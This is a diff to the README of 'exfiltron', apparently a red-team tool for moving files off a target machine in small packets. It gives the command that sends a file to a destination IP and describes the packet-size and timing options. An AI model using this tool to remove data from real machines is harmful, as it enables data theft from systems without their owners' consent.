TRDan6577/exfiltron/README.md

 file (exfiltron.py) and the server file.
 The client file must be placed on a target machine along with any modules you wish to use for your extraction method.
 SET UP THE SERVER SIDE INFORMATION HERE.
-After exfiltron.py has been placed on the target machine, run the following command:
+After exfiltron.py has been placed on the target machine, run the following command on the target:

-`python exfiltron.py exfiltrationMethod -f filename -d destinationIP [-h] [-a]`
+`python exfiltron.py exfiltrationMethod -f filename -d destinationIP [-h] [-a] [-t]`

 * -h is help
 * -a (--data-per-packet) is the amount of data you want to fit into each packet.
-The default is the number of bytes that normally sit in that packet while the min amount is 1 byte and the max amount is the MTU minus the size of the packet
+The default is the number of bytes that normally sit in that packet while the min amount is 1 byte and the max amount is the MTU minus the headers and trailers on the packet
 * -t (--time) specifies the amount of time to wait between after sending a packet before sending another packet.
 This numerical value should be given in terms of seconds.
 If no value is explicitly set, exfiltron defaults the value to 5 seconds